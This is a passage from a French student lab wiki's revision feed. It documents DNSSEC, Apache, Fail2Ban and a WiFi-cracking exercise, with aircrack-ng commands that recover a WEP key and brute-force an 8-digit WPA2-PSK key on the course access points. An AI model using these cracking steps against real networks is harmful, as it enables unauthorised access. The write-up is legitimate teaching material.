BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12334</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12334"/>
		<updated>2026-02-22T14:59:11Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Paramètrage sur machine mandataire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    $TTL 400&lt;br /&gt;
    ; Zone file for tompere.online&lt;br /&gt;
    @ IN SOA ns.tompere2.xyz. postmaster.tompere2.xyz. (&lt;br /&gt;
        3703        ; Serial&lt;br /&gt;
        21600       ; Refresh (6h)&lt;br /&gt;
        3600        ; Retry (1h)&lt;br /&gt;
        2592000     ; Expire (30 days)&lt;br /&gt;
        86400       ; Negative cache (24h)&lt;br /&gt;
        )&lt;br /&gt;
&lt;br /&gt;
    ; Name servers&lt;br /&gt;
    @ IN NS ns.tompere2.xyz.&lt;br /&gt;
    @ IN NS ns.tompere.online.&lt;br /&gt;
&lt;br /&gt;
    ; AAAA records (IPv6)&lt;br /&gt;
    @   IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
    ns IN AAAA 2001:660:4401:60a0:216:3eff:fe3f:9410&lt;br /&gt;
&lt;br /&gt;
    ; A records (IPv4)&lt;br /&gt;
    ns IN A 193.48.57.168&lt;br /&gt;
    @   IN A 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
    ; CNAME records&lt;br /&gt;
    www IN CNAME tompere2.xyz.&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nous avons choisi '''ns''' comme préfixe à nos noms de domaine. Il faut veiller à bien rester cohérent en remplissant la section '''External Nameservers''' de Gandi.&lt;br /&gt;
&lt;br /&gt;
Concernant l'adresse '''IPv4''', &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt; est l'adresse publique de la machine mandataire, ce qui est logique car elle doit être accessible depuis l'extérieur.&lt;br /&gt;
&lt;br /&gt;
Par ailleurs, il faut bien penser à ajouter les '''permissions aux dossiers parents''' de ce fichier de zone. Sinon, des logs ''&amp;quot;Permission Denied&amp;quot;'' apparaîtront, et le DNS sera non fonctionnel.&lt;br /&gt;
&lt;br /&gt;
La syntaxe de ce fichier doit être précise, ainsi, il est pratique de vérifier la validité du fichier via l'utilitaire &amp;lt;code&amp;gt;named-checkzone&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Aussi, pour s'assurer que les mises à jour du fichier sont prises en compte, il faut toujours modifier le numéro de série, par exemple en l'incrémentant de 1.&lt;br /&gt;
&lt;br /&gt;
Maintenant, modifions le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
    zone &amp;quot;tompere2.xyz&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;quot;;&lt;br /&gt;
        allow-transfer { secondaries; };  // Filtrage des secondaires&lt;br /&gt;
        also-notify { hiddensecondaries; };&lt;br /&gt;
&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    acl &amp;quot;secondaries&amp;quot; {&lt;br /&gt;
        192.168.0.2;   // Serveur secondaire IPv4&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe4b:1909; // Serveur secondaire IPv6&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    masters &amp;quot;hiddensecondaries&amp;quot; {&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fecd:2805; // Serveur mandataire IPv6&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
    zone &amp;quot;tompere.online&amp;quot;{&lt;br /&gt;
        type secondary;&lt;br /&gt;
        file &amp;quot;/etc/bind/backup/tompere&amp;quot;;&lt;br /&gt;
        primaries{ 2001:660:4401:60a0:216:3eff:fe4b:1909; };&lt;br /&gt;
    };&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier gère qui est maître ou secondaire pour chaque domaine, où est le fichier de zone, et quels serveurs sont autorisés à recevoir ou notifier les mises à jour.&lt;br /&gt;
&lt;br /&gt;
=== Glue Record ===&lt;br /&gt;
Pour que le domaine soit accessible depuis Internet, j’ai ajouté un '''Glue Record''' sur '''Gandi'''. &lt;br /&gt;
&lt;br /&gt;
Cela permet d’associer l’adresse '''IPv4''' de la machine mandataire et l’adresse '''IPv6''' de ma machine de services aux serveurs de noms du domaine.&lt;br /&gt;
&lt;br /&gt;
* ns.tompere2.xyz&lt;br /&gt;
** IPv4 : &amp;lt;code&amp;gt;193.48.57.168&amp;lt;/code&amp;gt;&lt;br /&gt;
** IPv6 : &amp;lt;code&amp;gt;2001:660:4401:60a0:216:3eff:fe3f:9410&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
Pour sécuriser le DNS et avoir un site en HTTPS, nous devons apporter quelques modifications au fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
En effet, nous allons rajouter ces lignes dans &amp;lt;code&amp;gt;zone &amp;quot;tompere2.xyz&amp;quot;&amp;lt;/code&amp;gt; &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
notify yes;  // Notification des secondaires&lt;br /&gt;
key-directory &amp;quot;/etc/bind/keys&amp;quot;; //repertoire des keys&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot;; //utilisation d'une politique DNSSEC&lt;br /&gt;
inline-signing yes; //activation de la signature automatique&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;De plus, il faut ajouter&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ces lignes servent à définir une '''politique de signature'''. Cela indique quelles clés utiliser (KSK/ZSK), leur durée de vie et l’algorithme de signature.&lt;br /&gt;
&lt;br /&gt;
Les clés vont être créer automatiquement au redémarrage de bind, mais il faut pour cela créer un dossier &amp;lt;code&amp;gt;/bind/keys&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, nous pouvons redémarrer bind pour vérifier la création des clés.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
systemctl restart named&lt;br /&gt;
systemctl enable named&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Les clés sont biens générées !&lt;br /&gt;
&lt;br /&gt;
Il faut désormais '''copier la clé publique''' (.key) sur '''Gandi'''.&lt;br /&gt;
&lt;br /&gt;
Dans mon cas, j'avais 2 clés publiques .key, donc j'ai copié ces deux clés sur Gandi, mais comme nous allons voir, une seule est utile.&lt;br /&gt;
&lt;br /&gt;
Pour mieux visualiser le déploiement de notre DNS, nous pouvons utiliser deux sites bien utiles :&lt;br /&gt;
*https://dnschecker.org/&lt;br /&gt;
*https://dnsviz.net/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;small&amp;gt;Remarque : Nous avons également utilisé &amp;lt;code&amp;gt;dig&amp;lt;/code&amp;gt; pour nos tests intermédiaires.&amp;lt;/small&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le premier site, DNSChecker, nous informe si la propagation de notre DNS a eu lieu.&lt;br /&gt;
&lt;br /&gt;
Dans le cas de '''tompere2.xyz''', on voit que c'est bon, aussi bien en IPv4 qu'en IPv6.&lt;br /&gt;
[[Fichier:Déploiement IPv4.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
[[Fichier:Déploiement DNS IPv6.png|néant|vignette|800x800px|Le DNS a bien été déployé partout dans le monde !]]&lt;br /&gt;
Le DNS marche bien ! Super !&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant s'assurer que la partie sécurisée, fonctionne également.&lt;br /&gt;
&lt;br /&gt;
Rendons nous sur '''DNSViz''', un outil qui nous donnera plus d'informations à ce sujet.&lt;br /&gt;
[[Fichier:DNS Viz.png|néant|vignette|Le DNSSEC fonctionne !]]&lt;br /&gt;
Comme on le vois, le DNSSEC fonctionne ! Cela dit, une clé est inutilisée, comme indiqué sur le schéma en gris clair. Nous pouvons la supprimer de '''Gandi,''' pour rendre l'architecture plus cohérente.&lt;br /&gt;
&lt;br /&gt;
== Serveur Apache ==&lt;br /&gt;
Notre DNSSEC est désormais fonctionnel, on peut alors passer à la configuration d'une page web via &amp;lt;code&amp;gt;apache2&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Objectif ===&lt;br /&gt;
L'objectif du serveur Apache sera de pouvoir servir les pages webs de nos machines de services.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install apache2&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Paramètrage sur machine mandataire ====&lt;br /&gt;
Avant de commencer, il nous faut activer quelques modules permettant le bon fonctionnement d'Apache.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;a2enmod ssl&amp;lt;/code&amp;gt; : active le module SSL pour permettre les connexions sécurisées en '''HTTPS (TLS)''' avec certificats.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;a2enmod proxy&amp;lt;/code&amp;gt; : active les fonctionnalités de '''reverse proxy''', permettant à Apache de rediriger les requêtes vers un autre serveur.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;a2enmod proxy_http&amp;lt;/code&amp;gt; : active le support du proxy pour le protocole '''HTTP.'''&lt;br /&gt;
&lt;br /&gt;
Sur la machine mandataire, nous avons créé et rempli le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/000-tompere2.xyz-ssl.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName ns.tompere2.xyz&lt;br /&gt;
    Redirect permanent / https://tompere2.xyz/    &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName tompere2.xyz&lt;br /&gt;
    ServerAlias tompere2.xyz&lt;br /&gt;
    DocumentRoot /var/www/html/&lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/tompere2.xyz.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/tompere2.xyz.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/tompere2.xyz.pem&lt;br /&gt;
    SSLVerifyClient None&lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ce fichier permet à la machine mandataire de gérer l’accès au site '''tompere2.xyz'''.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
[[Fichier:Mon site web.png|néant|vignette|Photo de mon site tompere2.xyz]]&lt;br /&gt;
&lt;br /&gt;
== Fail2Ban ==&lt;br /&gt;
&lt;br /&gt;
=== Contexte et objectifs ===&lt;br /&gt;
Les machines '''exposées en SSH''' sur Internet sont constamment ciblées par des '''attaques automatisées''' qui enchaînent des milliers de tentatives de '''connexion par force brute''' afin de deviner des identifiants. Il est donc essentiel de mettre en place un système comme '''Fail2ban pour détecte'''r ces tentatives répétées '''et bloquer''' automatiquement les adresses IP malveillantes.&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation du paquet ====&lt;br /&gt;
&amp;lt;code&amp;gt;apt update&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;apt install fail2ban&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Définition du Fail2Ban ====&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; de la '''machine mandataire''', nous pouvons définir la façon dont le fail2ban va agir.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
ignoreip = 127.0.0.1&lt;br /&gt;
findtime = 10m&lt;br /&gt;
bantime = 5m&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nous sommes protégés contre les tentatives de brute force par SSH. En effet, au bout de 3 échecs consécutifs, l'utilisateur malveillant est banni temporairement.&lt;br /&gt;
&lt;br /&gt;
== Effraction WiFi ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de cracotte10 ====&lt;br /&gt;
Pour trouver l'adresse MAC de cracotte10, nous pouvons utiliser &amp;lt;code&amp;gt;airodump-ng&amp;lt;/code&amp;gt;. Pour ce faire, nous devons tout d'abord trouver le '''nom de la carte réseau'''. On peut trouver cela via &amp;lt;code&amp;gt;ip link&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
J'obtiens alors &amp;lt;code&amp;gt;wlan0&amp;lt;/code&amp;gt;, mais pour augmenter la vitesse de cassage, nous utiliserons une clé USB Wi-Pi qui nous attribuera le &amp;lt;code&amp;gt;wlx40a5efd2140c&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on scanne grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid cracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:59  -69        2        1    0   4   54e. WEP  WEP         cracotte10              &lt;br /&gt;
&lt;br /&gt;
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de cracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;04:DA:D2:9C:50:59&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Récupération de données ====&lt;br /&gt;
Une fois '''l'adresse mac et le canal récupérés''', nous pouvons récupérer un flux de données qui sera stocké dans un fichier &amp;lt;code&amp;gt;.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:59 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WEP ====&lt;br /&gt;
Pendant que le fichier se remplit, on peut vérifier régulièrement si la clef a été trouvée.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -b 04:DA:D2:9C:50:58 *.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si le programme réussit, nous '''obtenons la clef !'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;KEY FOUND!   [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Désormais, nous voulons la clef WPA-PSK. Nous savons que cette clef est composée de 8 chiffres. Ainsi, la méthode sera de tester toutes les combinaisons possibles.&lt;br /&gt;
&lt;br /&gt;
==== Adresse MAC de kracotte10 ====&lt;br /&gt;
Nous obtenons l'adresse MAC grâce à:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng wlx40a5efd2140c --essid kracotte10&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous obtenons :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09  -67        4        0    0  13   54e. WPA2 CCMP   PSK  kracotte10              &lt;br /&gt;
&lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;L'adresse '''MAC de kracotte10''' est donc&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;44:AD:D9:5F:87:09&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Dictionnaire ====&lt;br /&gt;
Pour casser le mot de passe par force brute, il nous faut toutes les combinaisons possibles. Le paquetage &amp;lt;code&amp;gt;crunch&amp;lt;/code&amp;gt; est l'outil parfait dans notre cas.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons générer toutes ces combinaisons dans un fichier texte en faisant :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;crunch 8 8 0123456789 -o 8numbers_dico.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Handshake ====&lt;br /&gt;
Maintenant que nous avons l'adresse MAC et le dictionnaire, il nous faut un handshake, nous pouvons faire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:09 wlx40a5efd2140c --write dump&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de la clef WPA-PSK ====&lt;br /&gt;
Une fois avoir attendu quelques minutes, il suffit de lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;sudo aircrack-ng -w 8numbers_dico.txt -b 44:AD:D9:5F:87:09 dump-01.cap&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette commande va tester toutes les lignes du fichier texte. Dans notre cas, comme il y a 10 000 000 de possiblités, il faudra attendre une trentaine de minutes avant de trouver la clef.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
	                               Aircrack-ng 1.7&lt;br /&gt;
&lt;br /&gt;
      [00:31:37] 66625424/100000000 keys tested (34611.27 k/s)&lt;br /&gt;
&lt;br /&gt;
      Time left: 16 minutes, 4 seconds                          66.63%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66680666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 67 BB 05 71 A9 6D E4 5C 11 65 42 F7 BD 81 F1 7E&lt;br /&gt;
                       CD 69 8F FE F3 CD 2A 64 9D F1 74 7B 4D F0 CA 65&lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 45 9C CA 1B 45 A8 DA C5 1A 82 BF F5 C4 FF AF 01&lt;br /&gt;
                       FE CD F8 A4 21 38 1A 58 BB C5 DE BA 00 5B BF 2A&lt;br /&gt;
                       03 66 AF 4B 36 A8 B8 C4 B4 30 62 BB 30 73 DA 00&lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00&lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 48 08 73 07 B7 6C 9C FA 3A F1 58 DD 49 93 4C 3E&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation et accès WiFi par WPA2-EAP ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12333</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12333"/>
		<updated>2026-02-22T14:32:25Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Fail2Ban */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
